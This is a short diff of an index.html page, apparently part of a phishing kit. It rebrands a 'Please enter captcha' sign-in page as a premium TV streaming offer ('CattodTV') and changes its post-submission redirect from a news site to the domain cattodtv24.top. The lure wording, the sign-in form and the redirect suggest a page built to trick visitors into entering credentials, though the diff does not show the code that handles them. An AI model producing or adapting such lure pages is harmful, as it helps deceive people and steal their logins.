--- a/index.html
+++ b/index.html
@@ -2,8 +2,8 @@
 <head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
-  <meta name="description" content="CattoTV: Join us!">
-  <title>Please enter captcha - CattoTV</title>
+  <meta name="description" content="Watch premium tv channels directly from your phone! Join us today!">
+  <title>CattodTV - Welcome</title>
   <link rel="shortcut icon" href="apple-touch-icon-18b42bddd9d5db513d46f7c22955c0c5.png" />
   <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" />
   <link rel="stylesheet" href="https://getbootstrap.com/docs/4.5/examples/sign-in/signin.css" />
@@ -49,7 +49,7 @@
 
   
 <script type="text/javascript">
-const redirectUri = 'https://delfi.lv';
+const redirectUri = 'https://cattodtv24.top';
   
 function validateForm(){
     $('#logContainer').addClass('d-none');
